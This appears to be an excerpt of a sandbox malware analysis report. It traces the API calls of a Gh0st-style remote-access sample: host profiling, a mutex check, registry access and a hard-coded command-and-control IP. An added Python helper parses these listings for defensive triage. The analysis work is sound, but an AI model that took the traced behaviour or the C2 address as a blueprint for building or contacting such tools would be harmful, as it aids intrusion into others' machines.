                                                                    • Instruction Fuzzy Hash: 3E51E851C086CCEDEB12C7E8D8487DEBFB55B26349F0840D9E5847A282C6BE165CC776

                                                                    Control-flow Graph

                                                                    [Control-flow graph not reproduced: single block 1000712b-10007239 (memset * 2, wsprintfA, call 1000a5cc), with executed and non-executed blocks marked in the original report]
                                                                    APIs
                                                                    • memset.MSVCRT ref: 10007157
                                                                    • memset.MSVCRT ref: 10007169
                                                                    • wsprintfA.USER32 ref: 1000720F
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A601
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A614
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A622
                                                                      • Part of subcall function 1000A5CC: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A62F
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000A647
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000A657
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000A667
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000A674
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000A681
                                                                      • Part of subcall function 1000A5CC: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A69F
                                                                      • Part of subcall function 1000A5CC: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A80C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProcmemset$Library$FreeLoadOpenwsprintf
                                                                    • String ID: %$C$C$E$M$Rsjshd fzfgkqcm$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lSet\Services\%s$lSet\Services\%s$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 810712220-1893777433
                                                                    • Opcode ID: 0a44ea020a374581c80b03d6e5ade6fb3444afdf4d7155b5b984ecda8689c0a9
                                                                    • Instruction ID: 82b46aae5da0cc8703e41464dda74b7941b1ede7af1ffc32b8e9f74a15831d0f
                                                                    • Opcode Fuzzy Hash: 0a44ea020a374581c80b03d6e5ade6fb3444afdf4d7155b5b984ecda8689c0a9
                                                                    • Instruction Fuzzy Hash: D741CD50D0C6C9EDEF02C6A8C8497DFBFB55B26349F084098D6843A292C6FE575887B6

                                                                    Control-flow Graph

                                                                    [Control-flow graph not reproduced: block graph of the function starting at 401360 (entry block 401360-4014a8 with call 401000 * 3, VirtualAlloc blocks at 4014cd-4014e2 and 401500-401578, final block 4015cf-4015d8), with executed and non-executed blocks marked in the original report]
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$2$3$A$A$G$H$H$K$L$N$P$R$a$a$a$c$c$c$d$e$e$e$e$i$o$o$o$p$p$r$r$t
                                                                    • API String ID: 0-3752444969
                                                                    • Opcode ID: 2933b1640a77473e5a9bf63a7154480bbc0cbebac266aa1ac65446c5f0ad019f
                                                                    • Instruction ID: 00d2931fe6e782e78b6ecc90307b645ea51b53a64ad84e64509d03b0b15326ed
                                                                    • Opcode Fuzzy Hash: 2933b1640a77473e5a9bf63a7154480bbc0cbebac266aa1ac65446c5f0ad019f
                                                                    • Instruction Fuzzy Hash: 1481917120C3C0AEE351DB688844B5BBFD56B92348F48086DF6C49B392D2FAD518C767

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 10007C11
                                                                    • lstrcpyA.KERNEL32(?,Rsjshd fzfgkqcm,?,1001211C,?), ref: 10007C32
                                                                      • Part of subcall function 10007289: lstrlenA.KERNEL32(?,?,?,759183C0,00000100), ref: 100072E2
                                                                      • Part of subcall function 10007289: lstrcpyA.KERNEL32(?,Default,?,?,759183C0,00000100), ref: 100072EE
                                                                      • Part of subcall function 10007289: lstrlenA.KERNEL32(?,?,?,759183C0,00000100), ref: 100072F5
                                                                    • lstrcpyA.KERNEL32(?,Default), ref: 10007C67
                                                                    • memset.MSVCRT ref: 10007C86
                                                                    • getsockname.WS2_32(?,?,?), ref: 10007C9F
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 10007CB4
                                                                    • memcpy.MSVCRT(?,?,00000032,?,?,00000004), ref: 10007CC9
                                                                    • GetVersionExA.KERNEL32(?), ref: 10007CE2
                                                                    • RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 10007D19
                                                                    • RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?), ref: 10007D34
                                                                    • RegCloseKey.ADVAPI32(?), ref: 10007D3D
                                                                    • wsprintfA.USER32 ref: 10007D85
                                                                    • wsprintfA.USER32 ref: 10007D9A
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 10007DAF
                                                                    • GetDriveTypeA.KERNEL32(?), ref: 10007DEA
                                                                    • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?), ref: 10007E05
                                                                    • memset.MSVCRT ref: 10007E56
                                                                    • GetLastInputInfo.USER32(?), ref: 10007E7C
                                                                    • GetTickCount.KERNEL32 ref: 10007E82
                                                                    • lstrcpyA.KERNEL32(?,10012F70), ref: 10007EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpy$memset$lstrlenmemcpywsprintf$CloseCountDiskDriveFreeGlobalInfoInputLastMemoryOpenQuerySpaceStatusTickTypeValueVersiongetsockname
                                                                    • String ID: :$@$Default$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Rsjshd fzfgkqcm$V10.0 Pro$V5.0$\$~MHz
                                                                    • API String ID: 2919733465-4239207477
                                                                    • Opcode ID: d142667f6f4ca06a1dd7499e4939cd3fb2fcda4c2aae144bfe61f7145d162441
                                                                    • Instruction ID: e36f9bee0898f0eecf57ec343b3184e1500d21f13cb96f03395a289332e7a165
                                                                    • Opcode Fuzzy Hash: d142667f6f4ca06a1dd7499e4939cd3fb2fcda4c2aae144bfe61f7145d162441
                                                                    • Instruction Fuzzy Hash: EF81FDB6C0122CABEB11DBA4DC89ECEB7BCEF09351F4045A6E508E3145D774AA84CF60

                                                                    Control-flow Graph (rendered graph not reproduced; basic-block summary recovered from the graph data)
                                                                    • Function 00401990-00401B94: the entry block 401990-401a9f calls 401000 twice; a loop running from 401aba to 401b6f calls LoadLibraryA (401ac5-401ad1), then 4010f0 (401ad7-401af3) and 401000 again (401b32-401b42); the function exits at 401b88-401b94.
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040158A,00000000), ref: 00401AC8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID: .$2$3$A$B$I$K$L$L$L$N$P$b$d$d$d$d$e$i$o$r$r$r$s$t$y
                                                                    • API String ID: 1029625771-3388813359
                                                                    • Opcode ID: b1d882614961501901be177fc1f0da46e529f11cc82f20473a645d28c02f45c7
                                                                    • Instruction ID: 47ca0c19adcb0b32267935f5d69aec93d3a63e6231f51b2bfe92e8f32b603451
                                                                    • Opcode Fuzzy Hash: b1d882614961501901be177fc1f0da46e529f11cc82f20473a645d28c02f45c7
                                                                    • Instruction Fuzzy Hash: F8616F7150C3C19ED311CA68844475BFFE4AB92358F48496EF5C49B392D3BAE908C7A7

                                                                    Control-flow Graph (rendered graph not reproduced; basic-block summary recovered from the graph data)
                                                                    • Function 00401750-00401900: the entry block 401750-40185e calls 401000 twice; a loop running from 401869 to 4018f3 calls VirtualFree (401888-401899) on each pass; the function exits at 4018fb-401900.
                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,?,00004000,00000000,00000000,?,00000000,?,?,?,00000000), ref: 00401895
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID: .$2$3$F$KruV$L$P$V$V$a$a$c$d$e$e$e$i$i$l$l$l$l$o$r$r$r$r$u$u
                                                                    • API String ID: 1263568516-1588098630
                                                                    • Opcode ID: 1883f15f55cf7816e9bd0d9555f496c7e6a5d35e9ab2fc1f90b1f8d7aa62afe9
                                                                    • Instruction ID: b5451970975fc47b5202467ba196f3e9ecf33508c144bba1827580a19011a843
                                                                    • Opcode Fuzzy Hash: 1883f15f55cf7816e9bd0d9555f496c7e6a5d35e9ab2fc1f90b1f8d7aa62afe9
                                                                    • Instruction Fuzzy Hash: 06515D2150C3C08EE311DA68C444B5BBFE56BA6708F48499DF5C56B392D2BAD608C77B

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 10008BDF
                                                                    • wsprintfA.USER32 ref: 10008C10
                                                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 10008C24
                                                                    • GetLastError.KERNEL32 ref: 10008C30
                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 10008C3E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10008C45
                                                                    • exit.MSVCRT ref: 10008C4C
                                                                      • Part of subcall function 10001E14: setsockopt.WS2_32(?,0000FFFF,00000080,10008E5C,00000004), ref: 10001E39
                                                                      • Part of subcall function 10001E14: CancelIo.KERNEL32(?), ref: 10001E42
                                                                      • Part of subcall function 10001E14: InterlockedExchange.KERNEL32(?,00000000), ref: 10001E4E
                                                                      • Part of subcall function 10001E14: closesocket.WS2_32(?), ref: 10001E57
                                                                      • Part of subcall function 10001E14: SetEvent.KERNEL32(?), ref: 10001E60
                                                                      • Part of subcall function 10005CC4: TerminateThread.KERNEL32(?,000000FF,00000000,1001211C,?,10008E75), ref: 10005CE0
                                                                      • Part of subcall function 10005CC4: CloseHandle.KERNEL32(?), ref: 10005CE8
                                                                    • strstr.MSVCRT ref: 10008D01
                                                                    • strcspn.MSVCRT ref: 10008D15
                                                                    • strncpy.MSVCRT ref: 10008D20
                                                                    • strcspn.MSVCRT ref: 10008D28
                                                                    • strcpy.MSVCRT(00000000,?), ref: 10008D36
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10008D4C
                                                                    • atoi.MSVCRT(?), ref: 10008D59
                                                                    • lstrcatA.KERNEL32(00000000,110.40.45.163), ref: 10008D7B
                                                                    • strcmp.MSVCRT ref: 10008D8D
                                                                    • GetTickCount.KERNEL32 ref: 10008D9C
                                                                    • GetTickCount.KERNEL32 ref: 10008DBF
                                                                    • WaitForSingleObject.KERNEL32(00000064,00000064), ref: 10008E2E
                                                                    • Sleep.KERNEL32(000001F4), ref: 10008E3B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCountHandleMutexTicklstrcatstrcspn$CancelCreateErrorEventExchangeH_prologInterlockedLastObjectReleaseSingleSleepTerminateThreadWaitatoiclosesocketexitsetsockoptstrcmpstrcpystrncpystrstrwsprintf
                                                                    • String ID: %s:%d:%s$110.40.45.163$Rsjshd fzfgkqcm
                                                                    • API String ID: 1136866262-620539602
                                                                    • Opcode ID: e0b2d7cbaaf13b20cfa8b38897b83dee1724257a1626ba9cdb7bc931ceb6b2c5
                                                                    • Instruction ID: 9d3eb38b871e3855c9d74b804b4ce34c74b1fcffa4d5c0801ef7d38f2f3625d6
                                                                    • Opcode Fuzzy Hash: e0b2d7cbaaf13b20cfa8b38897b83dee1724257a1626ba9cdb7bc931ceb6b2c5
                                                                    • Instruction Fuzzy Hash: 3171427280426DABFF14DBB0CC88EEE77B8FB05384F54016AE505E6196DB319B49CB61

                                                                    Control-flow Graph (rendered graph not reproduced; basic-block summary recovered from the graph data)
                                                                    • Function 1000A5CC-1000A823: the entry block 1000a5cc-1000a6a4 calls memset three times, LoadLibraryA, GetProcAddress five times and RegOpenKeyExA; depending on the branch taken it then runs a loop at 1000a712-1000a746 (calls 1000a571 twice and 1000a5aa), or wsprintfA (1000a7ad-1000a7b9), or RegQueryValueExA (1000a7bb-1000a7dc) followed by lstrcpyA (1000a7e4-1000a7e8); all paths join at 1000a7f5-1000a804 (call 1000a826), then FreeLibrary (1000a806-1000a80c) and return at 1000a812-1000a823.
                                                                    APIs
                                                                    • memset.MSVCRT ref: 1000A601
                                                                    • memset.MSVCRT ref: 1000A614
                                                                    • memset.MSVCRT ref: 1000A622
                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A62F
                                                                    • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000A647
                                                                    • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000A657
                                                                    • GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000A667
                                                                    • GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000A674
                                                                    • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000A681
                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A69F
                                                                    • lstrcpyA.KERNEL32(00000072,?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A7E8
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A80C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$memset$Library$FreeLoadOpenlstrcpy
                                                                    • String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA$lSet\Services\%s
                                                                    • API String ID: 590445264-3792285081
                                                                    • Opcode ID: 4aef71da75aae053e3a71f9852c13206c6bebe33a8676f181667619ad66de447
                                                                    • Instruction ID: 6c1da8319406df289ef782658310202be30d02e36ad75691224a4dafe45f4e72
                                                                    • Opcode Fuzzy Hash: 4aef71da75aae053e3a71f9852c13206c6bebe33a8676f181667619ad66de447
                                                                    • Instruction Fuzzy Hash: 1961B9B180415DAFEF21DFA0CC84EDE7BB9FB09380F1042A6F619A2154E7359E959F60
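The API listings for the host-profile routine at 10007C11 (GetVersionExA, the CentralProcessor\0 ~MHz registry read, GlobalMemoryStatusEx, GetDiskFreeSpaceExA, GetLastInputInfo), the C2 string handling at 10008BDF (lstrcatA with 110.40.45.163) and the two registry helpers that resolve ADVAPI32 exports at run time (1000A5CC above and 1000A87A below) are easier to reason about once the bullets are parsed rather than read. The following Python is an added triage helper written for this page; it is not Joe Sandbox code and not part of the sample. It assumes the bullet layout shown in these listings, takes constructed sample lines copied from them, reports which steps of the Gh0st-style host-profile sequence are present, pulls any dotted-quad literal out of the argument columns, and decodes the registry hive handle 80000002 and the samDesired masks 00020019, 000F003F and 0002001F with the Windows SDK constants:

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# One "APIs" bullet of the report, with or without an argument list, e.g.
#   • lstrcpyA.KERNEL32(?,Rsjshd fzfgkqcm,?,1001211C,?), ref: 10007C32
#   • memset.MSVCRT ref: 10007C11
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]   # raw argument tokens as printed; "?" is an unresolved value
    ref: int          # call-site address

def parse_api_lines(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16)))
    return calls

# Host-profile sequence of the 10007C11 function: OS version, CPU MHz, RAM, disk, idle time.
HOST_PROFILE_INDICATORS = [
    ("os_version", lambda c: c.api.startswith("GetVersionEx")),
    ("cpu_mhz_key", lambda c: c.api.startswith("RegOpenKey") and any("CentralProcessor" in a for a in c.args)),
    ("cpu_mhz_val", lambda c: c.api.startswith("RegQueryValueEx") and any("~MHz" in a for a in c.args)),
    ("memory", lambda c: c.api == "GlobalMemoryStatusEx"),
    ("disk", lambda c: c.api.startswith("GetDiskFreeSpaceEx")),
    ("idle_time", lambda c: c.api == "GetLastInputInfo"),
]

def missing_host_profile_indicators(calls: list[ApiCall]) -> list[str]:
    """Indicators absent from `calls`; an empty list means the whole sequence is present."""
    return [label for label, pred in HOST_PROFILE_INDICATORS if not any(pred(c) for c in calls)]

IPV4 = re.compile(r"(?<![\w.])(?:25[0-5]|2[0-4]\d|1?\d?\d)(?:\.(?:25[0-5]|2[0-4]\d|1?\d?\d)){3}(?![\w.])")

def ipv4_literals(calls: list[ApiCall]) -> list[str]:
    """Dotted-quad literals passed as arguments; a hard-coded C2 address shows up here."""
    return sorted({m.group(0) for c in calls for a in c.args for m in IPV4.finditer(a)})

# Registry constants from the Windows SDK (winreg.h / winnt.h).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ALL_ACCESS, KEY_READ, KEY_WRITE = 0xF003F, 0x20019, 0x20006
KEY_RIGHTS = [("KEY_QUERY_VALUE", 0x1), ("KEY_SET_VALUE", 0x2), ("KEY_CREATE_SUB_KEY", 0x4),
              ("KEY_ENUMERATE_SUB_KEYS", 0x8), ("KEY_NOTIFY", 0x10), ("KEY_CREATE_LINK", 0x20),
              ("DELETE", 0x10000), ("READ_CONTROL", 0x20000), ("WRITE_DAC", 0x40000), ("WRITE_OWNER", 0x80000)]
SAM_ARG_INDEX = {"RegOpenKeyEx": 3, "RegCreateKeyEx": 5}  # argument position of samDesired

def describe_reg_access(mask: int) -> str:
    if mask == KEY_ALL_ACCESS:
        return "KEY_ALL_ACCESS"
    parts, covered = [], 0
    for name, value in (("KEY_READ", KEY_READ), ("KEY_WRITE", KEY_WRITE)):
        if mask & value == value:        # composite fully contained in the mask
            parts.append(name)
            covered |= value
    parts += [name for name, value in KEY_RIGHTS if mask & ~covered & value]
    return "|".join(parts) or f"0x{mask:X}"

def _hex(arg: str) -> int | None:
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None

def summarize_registry_calls(calls: list[ApiCall]) -> list[tuple]:
    """(api, hive, subkey, access) per Reg* call; None where the report prints no literal."""
    rows = []
    for c in calls:
        if not c.api.startswith("Reg"):
            continue
        hive = HIVES.get(_hex(c.args[0])) if c.args else None
        subkey = c.args[1] if len(c.args) > 1 and "\\" in c.args[1] else None
        access = None
        for stem, idx in SAM_ARG_INDEX.items():
            if c.api.startswith(stem) and len(c.args) > idx and _hex(c.args[idx]) is not None:
                access = describe_reg_access(_hex(c.args[idx]))
        rows.append((c.api, hive, subkey, access))
    return rows

# Constructed sample: bullets copied from this report's listings (functions 10007C11,
# 10008BDF, 1000A5CC and 1000A87A); the argument columns are the report's own guesses.
SAMPLE_APIS = r"""
• memset.MSVCRT ref: 10007C11
• GetVersionExA.KERNEL32(?), ref: 10007CE2
• RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 10007D19
• RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?), ref: 10007D34
• GlobalMemoryStatusEx.KERNEL32(?), ref: 10007DAF
• GetDiskFreeSpaceExA.KERNEL32(?,?,?,?), ref: 10007E05
• GetLastInputInfo.USER32(?), ref: 10007E7C
• lstrcatA.KERNEL32(00000000,110.40.45.163), ref: 10008D7B
• RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A69F
• RegCreateKeyExA.KERNEL32(?,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 1000A977
• RegOpenKeyExA.KERNEL32(0002001F,00000000,00000000,0002001F,?), ref: 1000A98E
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_APIS)
    print(missing_host_profile_indicators(calls), ipv4_literals(calls))
    print(*summarize_registry_calls(calls), sep="\n")
```

Run against the sample above it reports no missing host-profile step, one IPv4 literal (110.40.45.163), HKEY_LOCAL_MACHINE for the RegOpenKeyA call, KEY_READ for the 00020019 open, KEY_ALL_ACCESS for the RegCreateKeyExA call and KEY_READ|KEY_WRITE for the 0002001F open. The argument columns in these listings are Joe Sandbox's stack reconstruction, so the hive and mask decoding is only as reliable as the literal values it printed; a "?" stays unresolved rather than being guessed.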

                                                                    Control-flow Graph (rendered graph not reproduced; basic-block summary recovered from the graph data)
